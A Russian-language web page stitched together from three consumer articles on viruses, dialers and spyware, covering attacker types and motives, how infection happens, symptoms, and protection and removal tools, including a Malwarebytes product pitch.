Какие побочные эффекты, кроме основных деструктивных функций, могут нести с собой вирусы? Одно из «бесплатных приложений» — функция DOS (Denial of service) атаки на какие-либо сайты. В большинстве случаев жертвами становятся сайты антивирусных компаний, антиспамерские сайты и — как же без этого — сайт многострадальной компании Microsoft. Еще одним побочным эффектом является установка backdoor-компонента, вследствие чего злоумышленник получает полный контроль над компьютером пользователя. Чем это грозит, догадаться нетрудно.
Шпионы
В следующую группу входят программы-шпионы, сюда же можно отнести рекламные модули. Основным способом распространения программ данного вида является их установка в качестве компонента, зачастую неотделимого, в какую-либо программу. Кроме этого, есть нежелательная загрузка (описания см. выше) и загрузка отслеживающих cookies-файлов.
Что же делают данные индивидуумы? Начнем с общего для шпионов и рекламных модулей. Оба вида собирают информацию о пользователе и его компьютере, следят за его действиями, разновидность шпионов — reylogger»ы — еще и записывают все, что вы настучали на клавиатуре, в файл. Также отслеживается ваша активность в Интернете: что посещаете, где больше всего задерживаетесь, по каким ссылкам кликаете. После сбора данных вся информация отсылается хозяину. И тут пути шпионов и рекламных модулей расходятся. После сбора данных рекламными модулями информация чаще всего перепродается третьему лицу, которое внимательно ее изучает. После этого в лучшем случае составляется программа интернет-политики третьего лица типа: что предлагать, где вешать свою рекламу. Но это в лучшем случае, а в худшем — на ваш ящик просто начнут сыпаться мега/кило/тонны спам-писем.
Чем же отличаются шпионы? После изучения данных того же reylogger»а злоумышленник может узнать ваши личные строго конфиденциальные данные, которые впоследствии может использовать для шантажа. И такие случаи бывали. Кроме того, он может узнать пароли пользователя, а также найти слабые места в системе, с тем чтобы использовать все это для установки троянов и backdoor-компонентов. Чем это грозит, читайте выше.
Диалеры
Способы их проникновения не отличаются от вышеописанных. Поэтому сразу же перейдем к рассмотрению. Тут необходимо оговориться, что существуют вполне мирные диалеры, называемые в народе «звонилками». Эти программы используются с целью помочь пользователям dial-up»a дозвониться до провайдера и по возможности поддерживать с ним стабильную связь даже на старых или «модернизированных» линиях. Те же, о которых пойдет наш разговор, имеют другое название — боевые диалеры. Используя бреши в операционной системе, а иногда и по халатности или наивности пользователей (см. выше про 100% крэк Интернета) данные программы подменяют телефон провайдера телефоном оператора связи из какой-нибудь экзотической страны. Причем в большинстве случаев в окне набора номера остается старый добрый телефон провайдера. Еще диалеры прописывают в планировщике задание позвонить в заданное время. И хорошо если пользователь имеет привычку выключать модем или он у него внешний и орет так, что мама не горюй. А если модем тихонький да встроенный? Вот и я о том. И узнает бедолага о своем горе лишь по приходе ба-а-альшого такого счета за телефон.
Кто
Пришла пора рассказать о том, кто же пишет и запускает всю эту гадость в Сеть. Здесь я попытаюсь классифицировать те группы людей, которые занимаются этим неблаговидным делом. Здесь не будет сказано о так называемых «белых» хакерах. Объясню, почему. Данная разновидность не представляет опасности для общества и скорее несет ему пользу. Именно они чаще всего пишут вирусы-антивирусы для обезвреживания особо вредоносных особей. Почему вирусы? Эти программы распространяются по тому же механизму, что и вирусы. Почему анти-? Потому, что блокируют или удаляют определенный вид вируса с компьютера. Главным их отличием от вирусов является также самоликвидация после выполнения своей задачи и отсутствие каких-либо деструктивных функций. Примером может служить подобный вирус, появившийся в Сети через некоторое время после рецидива Lovesan»а. После загрузки вируса-антивируса Lovesan удалялся, а пользователю предлагалось загрузить обновления для Windows. «Белые» хакеры также находят бреши в программном обеспечении и компьютерных системах, после чего сообщают о найденных ошибках компаниям. Теперь перейдем непосредственно к нашей классификации.
Тип первый: «дети скриптов». Зовут себя не иначе как 37717 (00|_ HaCkeR-rr, читают журнал «Хакер», не знают ни одного языка программирования, а всех «своих» троянов и вирусов творят посредством скачивания готовых программ из Сети. (Чтобы избежать наездов, оговорюсь, что журнал «Хакер», в принципе, неплох, и материал в нем подается в довольно простой форме — местами, правда. Но в простой форме для людей, уже имеющих какой-то багаж знаний. И материал они дают с умом — не рассказывают все до конца — дабы не привлекли их никуда, надо думать.) Эти «хакеры» обычно, после того как пришлют кому-нибудь скачанный откуда-нибудь троян, и последний сработает, тут же начинают орать на форумах о своей крутизне и т.д., и т.п. За что тут же вполне справедливо получают в свой адрес кучу нелицеприятных высказываний, ибо не дело это. Раз уж напакостил, то лучше помолчи. Особой опасности данные индивиды не представляют, т.к. на более-менее масштабное дело у них просто не хватит ни опыта, ни (в некоторых случаях) мозгов.
Тип второй: «начинающий». Данный вид является прямым потомком первого. Некоторые из представителей первого типа спустя некоторый промежуток времени начинают понимать, что они не так круты, как им казалось, что, оказывается, существуют какие-то языки программирования, что можно что-то сделать и после этого не орать на весь мир про то, какой я молодец. Кто-то из них в будущем, возможно, превратится в представителя класса профи. Эти люди начинают учить какой-нибудь язык, пробовать что-то писать, в них начинает просыпаться творческая мысль. И одновременно они начинают представлять определенную опасность для общества, ибо кто знает, какое ужасающее произведение по неопытности может написать такой представитель класса вирусописателей. Ведь когда код пишет профессионал, он все-таки осознает, что некоторые вещи делать не нужно, т.к. они могут сыграть против него. У новичка таких знаний нет, и этим он опасен.
Тип третий: «профи». Развиваются из второго вида. «Профи» отличаются глубоким знанием языков программирования, сетевой безопасности, разбираются в глубинах операционных систем и, что самое важное, обладают очень серьезными знаниями и пониманием механизма работы сетей и компьютерных систем. Причем «профи» не только узнают о брешах в системах безопасности из бюллетеней компаний, но и сами находят их. Часто они объединяются в хакерские группы для улучшения качества своей «работы». Эти люди в основном скрытные и не жадные до славы, при проведении какой-нибудь успешной операции не бегут сообщать об этом всему миру, а предпочитают мирно отпраздновать успех в кругу друзей. Безусловно, представляют большую опасность, но, поскольку все они люди знающие, то не пойдут на действия, которые могут вызвать глобальный обвал какой-либо системы — к примеру, Интернета. Хотя бывают и исключения (не все еще забыли про Slammer»a).
Тип четвертый: «промышленные хакеры». Наиболее опасные для общества представители семейства хакеров. Их по праву можно называть настоящими преступниками. Именно на их совести лежит написание большей части диалеров и взлом сетей банков, крупных компаний и правительственных учреждений. Зачем и ради чего они это делают, мы поговорим ниже. «Промышленники» не считаются ни с чем и ни с кем, эти индивиды способны сделать все ради достижения своих целей.
Теперь обобщим написанное. «Дети скриптов»: молодо-зелено да неопытно. Хочется показать, что ты круче всех, а круче тебя — только Крутой Сэм.
«Начинающий»: появилась тяга к написанию чего-то самостоятельного. Часть из них, к счастью, после попытки освоения премудростей интернет-протоколов и языков программирования бросают это дело и идут заниматься чем-то более мирным.
«Профи»: если вдруг наступает состояние «осознал свою вину, меру, степень, глубину», то представитель данного вида становится высококвалифицированным специалистом по компьютерной безопасности. Хотелось бы, чтобы побольше профи перешло к такому состоянию.
«Промышленники»: ничего святого. Про таких хорошо говорит народная мудрость: «Горбатого могила исправит».
Таково грубое разделение на типы представителей класса компьютерных злоумышленников. Теперь перейдем к вопросу, зачем они это делают.
Зачем
А действительно, зачем пишутся вирусы, трояны, диалеры и прочая нечисть? Одной из причин является желание самоутверждения. Оно характерно для представителей первого и второго типа. Одному просто нужно показать своим друзьям, что он «типа того, реальна, крутой пацан», второму — прежде всего для поднятия уровня самооценки. Вторая причина — получение опыта. Характерна для начинающих. После написания своего первого шедевра, естественно, хочется его на ком-нибудь испытать. Не на себе же, в самом деле. Вот и появляется в Сети определенное число новых, не всегда очень опасных, вирусов. Следующая причина — дух соперничества. Вы никогда не слышали про хакерские соревнования? Последнее известное мне состоялось летом. Победила бразильская хакерская группа (оказывается, не только футбол у них силен). Задача стояла следующая: кто сломает больше всего сайтов. Но я уверен, что есть соревнования и по самому навороченному вирусу, и по самому лучшему клавиатурному шпиону. Адреналин — еще одна причина. Представьте себе: ночь, свет монитора, пальцы бегают по клавиатуре, вчера была найдена брешь в системе защиты, сегодня нужно попытаться получить доступ к системе и показать товарищу администратору, кто в доме хозяин. Следом за этой причиной идет и следующая — романтика. А что, кому нравится на закат смотреть, кому на звезды, а кому — вирусы писать да сайты дефейсить. Сколько людей, столько и вкусов. Причина следующая — политический или социальный протест. По этой причине взламывается большинство правительственных сайтов, сайтов политических партий, печатных и интернет-изданий, а также крупных корпораций. За примерами далеко ходить не надо. Сразу же после начала войны в Ираке были произведены атаки на правительственные американские сайты со стороны недовольных политикой Буша, а также на сайт арабской газеты «Аль-Джазира» и ряд других арабских ресурсов с противоположной стороны. И, пожалуй, последняя причина — это вездесущие деньги. Ради них в основном работают, если можно так выразиться, промышленные хакеры. Взламывая сети банков, они получают доступ к счетам клиентов. Что за этим последует, догадаться нетрудно. Собирая информацию о любом пользователе Сети посредством программ-шпионов, они в дальнейшем занимаются банальным шантажом. Действия, на которые идут «промышленники», можно перечислять еще очень долго, хочу лишь еще раз сказать, что именно они являются полноценными компьютерными преступниками, и относиться к ним нужно как к преступникам.
Дабы избежать гневных писем в свой адрес на тему: «А что, остальные такие добрые и пушистые, что ты их так защищаешь?», скажу следующее. Защищать я никого не собирался, и никто из представителей четырех описанных видов не является ангелом во плоти — все они несут определенное зло. Но хакеры периодически дают нам понять, что не все совершенно в этом мире. Приведу пример. Вирус Slammer, на время парализовавший работу Интернета, использовал ошибку, которую Microsoft обнаружила и выложила заплатку за три месяца до этого. Но следует помнить, что приведенный пример — исключение. А посему необходимо соблюдать хотя бы основы компьютерной безопасности.
Андрей Радзевич
В статье использованы материалы Большой вирусной энциклопедии, viruslist.com
Пользуясь Интернетом, не стоит думать, что Ваша конфиденциальность защищена. Недоброжелатели часто следят за Вашими действиями и стремятся заполучить Вашу личную информацию с помощью особого вредоносного ПО – шпионских программ. Это один из самых старых и самых распространенных типов угроз в сети Интернет: эти программы без разрешения проникают на Ваш компьютер, чтобы инициировать различные противозаконные действия. Стать жертвой таких программ очень легко, однако избавиться от них бывает сложно – особенно в том случае, когда Вы даже не знаете, что Ваш компьютер заражен. Но не стоит отчаиваться! Мы не оставим Вас один на один с угрозами! Вам лишь нужно знать, что такое шпионские программы, как они проникают на компьютер, как они пытаются навредить Вам, как устранить эти программы и как можно предотвратить атаки шпионских программ в будущем.
Что такое шпионская программа?
История шпионских программ
Термин «шпионская программа» впервые был упомянут в 1996 году в одной из специализированных статей. В 1999 году этот термин использовался в пресс-релизах и уже имел то значение, которое закреплено за ним сегодня. Он быстро приобрел популярность в средствах массовой информации. Прошло немного времени, и в июне 2000 года было выпущено первое приложение, предназначенное для борьбы со шпионскими программами.
«Первые упоминания о шпионских программах датируются 1996 годом».
В октябре 2004 года медийная компания America Online и Национальный альянс кибербезопасности (NCSA) провели исследование данного феномена. Результат оказался невероятным и пугающим. Около 80 % всех пользователей сети Интернет так или иначе сталкивались с проникновением шпионских программ на свои компьютеры, приблизительно на 93 % компьютеров присутствовали компоненты шпионских программ, при этом 89 % пользователей не знали об этом. И почти все пользователи, пострадавшие от шпионских программ (около 95 %), признали, что не давали разрешения на их установку.
На сегодняшний день операционная система Windows является предпочтительной целью для атак шпионских программ в силу своей широкой распространенности. Вместе с тем, в последние годы разработчики шпионских программ также обращают внимание на платформу Apple и на мобильные устройства.
Шпионские программы для Mac
Исторически сложилось так, что авторы шпионских программ считают своей главной целью платформу Windows, поскольку она имеет более обширную базу пользователей, чем платформа Mac. Несмотря на это в 2017 году отрасль пережила существенный всплеск активности вредоносного ПО для компьютеров Mac, причем большая часть атак была совершена посредством шпионских программ. Шпионские программы для Mac имеют модель поведения, аналогичную шпионским программам для Windows, однако среди них преобладают программы для кражи паролей и бэкдоры общего назначения. К вредоносным действиям ПО, принадлежащего ко второй категории, относится удаленное выполнение вредоносного кода, кейлоггинг , захват изображения экрана, произвольная загрузка и скачивание файлов, фишинг паролей и т. д.
«В 2017 году отрасль пережила существенный всплеск активности вредоносного ПО для компьютеров Mac, причем большая часть атак была совершена посредством шпионских программ».
Помимо вредоносных шпионских программ, в среде Mac также нередко встречаются так называемые «законные» шпионские программы. Эти программы продаются реально существующими компаниями на официальных веб-сайтах, а в качестве их основной цели декларируется контроль за детьми или сотрудниками. Разумеется, такие программы являются классической «палкой о двух концах»: они допускают возможность злоупотребления своими функциями, поскольку предоставляют обычному пользователю доступ к инструментарию шпионских программ, не требуя для этого каких-либо специальных знаний.
Шпионские программы для мобильных устройств
Шпионские программы не создают ярлыка и могут подолгу находиться в памяти мобильного устройства, похищая важную информацию, например входящие/исходящие SMS-сообщения, журналы входящих/исходящих звонков, списки контактов, сообщения электронной почты, историю браузера и фотографии. Кроме того, шпионские программы для мобильных устройств потенциально могут отслеживать нажатия клавиш, записывать звуки в радиусе действия микрофона Вашего устройства, делать фотографии в фоновом режиме, а также отслеживать положение Вашего устройства с помощью GPS. В некоторых случаях шпионским программам даже удается контролировать устройство с помощью команд, отправляемых по SMS и/или приходящих с удаленных серверов. Шпионские программы отправляют похищенные сведения по электронной почте или посредством обмена данных с удаленным сервером.
Не стоит забывать, что потребители являются не единственной целью злоумышленников, создающих шпионские программы. Если Вы используете свой смартфон или планшетный компьютер на рабочем месте, хакеры могут атаковать организацию Вашего работодателя за счет уязвимостей, заложенных в системе мобильных устройств. Более того, группам реагирования на инциденты в области компьютерной безопасности может быть не под силу выявлять атаки, совершаемые через мобильные устройства.
Шпионские программы обычно проникают на смартфоны тремя способами:
- Незащищенная бесплатная Wi-Fi-сеть, которая часто устанавливается в публичных местах, например в аэропортах и кафе. Если Вы зарегистрировались в такой сети и передаете данные через незащищенное соединение, злоумышленники могут следить за всеми действиями, которые Вы совершаете, пока остаетесь в сети. Обращайте внимание на предупреждающие сообщения, отображаемые на экране Вашего устройства, – особенно в том случае, если они указывают на сбой при проверке подлинности удостоверения сервера. Позаботьтесь о своей безопасности: избегайте таких незащищенных соединений.
- Уязвимости операционной системы могут создать предпосылки для проникновения вредоносных объектов на мобильное устройство. Производители смартфонов часто выпускают обновления для операционных систем, чтобы защитить пользователей. Поэтому мы рекомендуем Вам устанавливать обновления, как только они становятся доступными (до того, как хакеры попытаются атаковать устройства, на которых установлены устаревшие программы).
- Вредоносные объекты часто скрываются в обычных на первый взгляд программах – и вероятность этого возрастает в том случае, если Вы загружаете их не через магазин приложений, а с веб-сайтов или через сообщения. Во время установки приложений важно обращать внимание на предупреждающие сообщения, особенно если они запрашивают разрешение на доступ к Вашей электронной почте или другим персональным данным. Таким образом, мы можем сформулировать главное правило безопасности: пользуйтесь только проверенными ресурсами для мобильных устройств и избегайте приложений сторонних разработчиков.
Кого атакуют шпионские программы?
В отличие от других типов вредоносного ПО, разработчики шпионских программ не стремятся нацелить свои продукты на какую-либо конкретную группу людей. Напротив, в ходе большинства атак шпионские программы разворачивают свои сети очень широко, чтобы поразить как можно больше устройств. Следовательно, каждый пользователь потенциально является целью шпионских программ, ведь, как справедливо полагают злоумышленники, даже самый крохотный объем данных рано или поздно найдет своего покупателя.
«В ходе большинства атак шпионские программы разворачивают свои сети очень широко, чтобы поразить как можно больше устройств».
Например, спамеры покупают адреса электронной почты и пароли, чтобы рассылать вредоносный спам или совершать какие-либо действия под видом других лиц. В результате атак шпионских программ на финансовую информацию кто-то может лишиться средств на банковском счете или стать жертвой аферистов, использующих в своих махинациях настоящие банковские счета.
Информация, полученная из похищенных документов, изображений, видеозаписей и других цифровых форм хранения данных, может использоваться для вымогательства.
В конечном итоге никто не застрахован от атак шпионских программ, а хакеры особо не задумываются над тем, чьи компьютеры они заражают в погоне за достижением своих целей.
Что делать, если мой компьютер заражен?
Проникшая в систему шпионская программа стремится оставаться незамеченной, и обнаружить ее можно только в том случае, если пользователь обладает достаточным опытом и действительно знает, где следует искать. Так что многие пользователи продолжают работать, не подозревая об угрозе. Но если Вам кажется, что на компьютер проникла шпионская программа, нужно прежде всего очистить систему от вредоносных объектов, чтобы не скомпрометировать новые пароли. Установите надежный антивирус, который способен обеспечить должную кибербезопасность и использует агрессивные алгоритмы обнаружения и удаления шпионских программ. Это важно, поскольку только агрессивные действия антивируса способны полностью удалить из системы артефакты шпионских программ, а также восстановить поврежденные файлы и нарушенные настройки.
Очистив систему от угроз, обратитесь к представителям своего банка, чтобы предупредить о потенциальной вредоносной активности. В зависимости от того, какая информация была скомпрометирована на зараженном компьютере (особенно если он подключен к сети предприятия или организации), закон может требовать от Вас сообщить правоохранительным органам о фактах проникновения вирусов или сделать соответствующее публичное заявление. Если информация носит деликатный характер или связана со сбором и передачей изображений, аудио- и/или видеофайлов, Вам следует обратиться к представителю правоохранительных органов и сообщить о потенциальных нарушениях федерального или местного законодательства.
И последнее: Многие поставщики средств защиты от кражи идентификационных данных заявляют, что их сервисы могут выявлять мошеннические транзакции или временно блокировать Ваш кредитный счет во избежание ущерба от вредоносных действий нежелательных программ. На первый взгляд, блокировка кредитной карты – действительно здравая идея. Однако компания Malwarebytes настоятельно рекомендует не покупать средства защиты от кражи идентификационных данных .
«Многие поставщики средств защиты от кражи идентификационных данных заявляют, что их сервисы могут выявлять мошеннические транзакции».
Как защититься от шпионских программ?
Наилучшая защита от шпионских программ, как и от большинства типов вредоносного ПО, в первую очередь зависит от Ваших действий. Пожалуйста, следуйте этим базовым рекомендациям, благодаря которым Вы сможете обеспечить свою кибербезопасность:
- Не открывайте электронные письма, присланные неизвестными отправителями.
- Не загружайте файлы из непроверенных источников.
- Прежде чем переходить по ссылке, наводите на нее курсор мыши, чтобы проверить, на какую веб-страницу она Вас приведет.
Но по мере того как пользователи накапливали опыт в области кибербезопасности, хакеры тоже становились хитрее, создавая все более изощренные способы доставки шпионских программ. Именно поэтому установка антивируса, доказавшего свою эффективность, чрезвычайно важна для противодействия самым современным шпионским программам.
Ищите антивирусы, которые предоставляют защиту в реальном времени. Данная функция позволяет автоматически блокировать шпионские программы и другие угрозы до того, как они смогут навредить Вашему компьютеру. Некоторые традиционные антивирусы и другие средства обеспечения кибербезопасности во многом полагаются на сигнатурные алгоритмы обнаружения – а такую защиту легко обойти, особенно если речь идет о современных угрозах.
Также следует обращать внимание на наличие функций, которые блокируют само проникновение шпионских программ на компьютер. Например, это может быть технология противодействия эксплойтам и защита от вредоносных веб-сайтов, на которых хранятся шпионские программы. Premium-версия программы Malwarebytes имеет проверенную репутацию и является надежным средством защиты от шпионских программ.
В цифровом мире опасности являются неотъемлемой частью интернет-действительности и могут подстерегать Вас на каждом шагу. К счастью, есть простые и эффективные способы защититься от них. Если Вы будете поддерживать разумный баланс между применением антивируса и соблюдением основных мер предосторожности, Вам удастся оградить каждый используемый компьютер от атак шпионских программ и от действий злоумышленников, которые за ними стоят.
Со всеми нашими отчетами о шпионских программах Вы можете ознакомиться
С вирусами и последствиями их воздействия на компьютерные системы сегодня знакомы практически все пользователи. Среди всех угроз, которые получили наибольшее распространение отдельное место занимают программы-шпионы, следящие за действиями юзеров и занимающиеся кражей конфиденциальной информации. Далее будет показано, что собой представляют такие приложения и апплеты, и рассмотрен вопрос, связанный с тем, как обнаружить шпионскую программу на компьютере и избавиться от такой угрозы без вреда для системы.
Что такое шпионская программа?
Начнем с того, что шпионские приложения, или исполняемые апплеты, обычно называемые Spyware (spy по-английски «шпион»), в обычном смысле вирусами, как таковыми, не являются. То есть они не оказывают практически никакого воздействия на систему в плане ее целостности или работоспособности, хотя при заражении компьютеров способны постоянно находиться в оперативной памяти и потреблять часть системных ресурсов. Но, как правило, на быстродействии ОС это особо не сказывается.
Но вот основным их назначением является именно отслеживание работы пользователя, а по возможности — кража конфиденциальных данных, подмена электронной почты с целью рассылки спама, анализ запросов в Интернете и перенаправление на сайты, содержащие вредоносное ПО, анализ информации на винчестере и т. д. Само собой разумеется, что у любого юзера должен быть установлен хотя бы примитивный антивирусный пакет для защиты. Правда, в большинстве своем ни бесплатные антивирусы, ни тем более встроенный брэндмауэр Windows полной уверенности в безопасности не дают. Некоторые приложения могут просто не распознаваться. Вот тут и возникает вполне закономерный вопрос: «А какой же тогда должна быть защита компьютера от шпионских программ?» Попробуем рассмотреть основные аспекты и понятия.
Виды шпионских программ
Прежде чем приступать к практическому решению, следует четко себе представлять, какие именно приложения и апплеты относятся к классу Spyware. На сегодняшний день различают несколько основных типов:
- кей-логгеры;
- сканеры жестких дисков;
- экранные шпионы;
- почтовые шпионы;
- прокси-шпионы.
Каждая такая программа по-разному воздействует на систему, поэтому далее посмотрим, как именно проникают шпионские программы на компьютер и что они могут натворить в зараженной системе.
Методы проникновения Spyware в компьютерные системы
Сегодня в связи с неимоверным развитием интернет-технологий Всемирная паутина является основным открытым и слабозащищенным каналом, который угрозы такого типа используют для внедрения в локальные компьютерные системы или сети.
В некоторых случаях шпионские программы на компьютер устанавливает сам пользователь, как ни парадоксально это звучит. В большинстве случаев он об этом даже не догадывается. А все банально просто. Например, скачали вы из Интернета вроде бы интересную программу и запустили установку. На первых стадиях все выглядит, как обычно. Но вот потом иногда появляются окна с предложением инсталляции какого-то дополнительного программного продукта или надстройки к Интернет-браузеру. Обычно все это написано мелким шрифтом. Пользователь, стремясь побыстрее завершить процесс установки и приступить к работе с новым приложением, зачастую не обращает на это внимания, соглашается со всеми условиями и… в итоге получает внедренного «агента» по сбору информации.
Иногда шпионские программы на компьютер устанавливаются в фоновом режиме, маскируясь потом по важные системные процессы. Вариантов тут может быть предостаточно: инсталляция непроверенного ПО, загрузка контента из Интернета, открытие сомнительных вложений электронной почты и даже простое посещение некоторых небезопасных ресурсов в Сети. Как уже понятно, отследить такую установку без специальной защиты просто невозможно.
Последствия воздействия
Что касается вреда, наносимого шпионами, как уже было сказано, на системе это в целом не отражается никоим образом, но вот пользовательская информация и личные данные подвержены риску.
Наиболее опасными среди всех приложений такого типа являются так называемые кей-логгеры, а проще говоря, Как раз они и способны следить за набором символов, что дает злоумышленнику возможность получения тех же логинов и паролей, банковских реквизитов или пин-кодов карт, и всего-того, что пользователь не хотел бы сделать достоянием широкого круга людей. Как правило, после определения всех данных происходит их отсылка либо на удаленный сервер, либо по электронной почте, естественно, в скрытом режиме. Поэтому рекомендуется применять для хранения столь важной информации специальные утилиты-шифровальщики. К тому же сохранять файлы желательно не на жестком диске (их запросто найдут сканеры винчестеров), а на съемных носителях, да хотя бы на флэшке, причем обязательно вместе с ключом дешифратора.
Кроме всего прочего, многие специалисты считают наиболее безопасным использование экранной клавиатуры, хотя и признают неудобство этого метода.
Отслеживание экрана в плане того, чем именно занимается юзер, опасность представляет только в случае, когда вводятся конфиденциальные данные или регистрационные реквизиты. Шпион просто через определенное время делает скриншоты и отправляет их злоумышленнику. Использование экранной клавиатуры, как в первом случае, результата не даст. А если два шпиона работают одновременно, то вообще никуда не скроешься.
Отслеживание электронной почты производится по списку контактов. Основной целью является подмена содержимого письма при отправке его с целью рассылки спама.
Прокси-шпионы вред наносят только в том смысле, что превращают локальный компьютерный терминал в некое подобие прокси-сервера. Зачем это нужно? Да только затем, чтобы прикрыться, скажем, IP-адресом юзера при совершении противоправных действий. Естественно, пользователь об это не догадывается. Вот, допустим, кто-то взломал систему защиты какого-то банка и украл энную сумму денег. Отслеживание действий уполномоченными службами выявляет, что взлом был произведен с терминала с таким-то IP, находящегося по такому-то адресу. К ничего не подозревающему человеку приезжают спецслужбы и отправляют за решетку. Правда, ничего хорошего в этом нет?
Первые симптомы заражения
Теперь переходим к практике. Как проверить компьютер на шпионские программы, если вдруг по каким-то причинам закрались сомнения в целостности системы безопасности? Для этого нужно знать, как на первых стадиях проявляется воздействие таких приложений.
Если ни с того ни с сего замечено снижение быстродействия, или система периодически «виснет», или вообще отказывается работать, для начала следует посмотреть на использование нагрузки на процессор и оперативную память, а также провести мониторинг всех активных процессов.
В большинстве случаев пользователь в том же «Диспетчере задач» увидит незнакомые службы, которых до этого в дереве процессов не было. Это только первый звоночек. Создатели программ-шпионов далеко не глупы, поэтому создают программы, которые маскируются под системные процессы, а выявить их без специальных знаний в ручном режиме просто невозможно. Потом начинаются проблемы с подключением к Интернету, изменяется стартовая страница и т. д.
Как проверить компьютер на наличие шпионских программ
Что же касается проверки, штатные антивирусы тут не помогут, особенно если они уже пропустили угрозу. Как минимум потребуется какая-то портативная версия вроде или Kaspersky Virus Removal Tool (а лучше — что-то наподобие Rescue Disc с проверкой системы еще до ее загрузки).
Как найти шпионскую программу на компьютере? В большинстве случаев рекомендуется использовать узконаправленные специальные программы класса Anti-Spyware (SpywareBlaster, AVZ, XoftSpySE Anti-Spyware, Microsoft Antispyware и др.). Процесс сканирования в них полностью автоматизирован, равно как и последующее удаление. Но и тут есть вещи, на которые стоит обратить внимание.
Как удалить шпионскую программу с компьютера: стандартные методы и используемое стороннее ПО
Удалить шпионское ПО с компьютера можно даже вручную, но только при условии, что программа не замаскирована.
Для этого можно обратиться к разделу программ и компонентов, найти искомое приложение в списке и запустить процесс деинсталляции. Правда, деинсталлятор Windows, мягко говоря, не совсем хорош, поскольку оставляет после завершения процесса кучу компьютерного мусора, так что лушче использовать специализированные утилиты вроде iObit Uninstaller, которые, кроме удаления стандартным способом, позволяют производить углубленное сканирование на предмет поиска остаточных файлов или даже ключей и записей в системном реестре.
Теперь пару слов о нашумевшей утилите Spyhunter. Многие ее называют чуть ли не панацеей от всех бед. Позволим себе с этим не согласиться. Сканирует она систему еще ничего, правда, иногда выдает ложное срабатывание Проблема не в этом. Дело в том, что деинсталлировать ее оказывается достаточно проблематично. У рядового пользователя от всего того количества действий, которые нужно выполнить, просто голова кругом идет.
Что использовать? Защита от таких угроз и поиск шпионских программ на компьютере можно осуществить, например, даже при помощи пакета ESETNOD32 или Smart Security с активированной функцией «Антивор». Впрочем, каждый сам выбирает, что для него лучше и проще.
Узаконенный шпионаж в Windows 10
Но и на этом еще не все. Все выше сказанное касалось только того, как проникают шпионские программы в систему, как ведут себя и т. д. Но что делать, когда шпионаж узаконен?
Windows 10 в этом плане отличилась не в лучшую сторону. Тут имеется куча служб, которые нужно отключить (обмен данными с удаленными серверами Microsoft, использование идентификации для получения рекламы, отправку данных в компанию, определение местоположения с использованием телеметрии, получение обновлений из нескольких мест и т. д.).
Существует ли 100-процентная защита?
Если посмотреть внимательно на то, как проникают шпионские программы на компьютер и что они делают впоследствии, о 100-процентной защите можно сказать только одно: ее не существует. Даже при задействовании всего арсенала средств в безопасности можно быть уверенным процентов на 80, не более. Однако и со стороны самого пользователя должны отсутствовать провоцирующие действия в виде посещения сомнительных сайтов, установки небезопасного программного обеспечения, игнорирование предупреждений антивируса, открытие вложений электронной почты из неизвестных источников и т. д.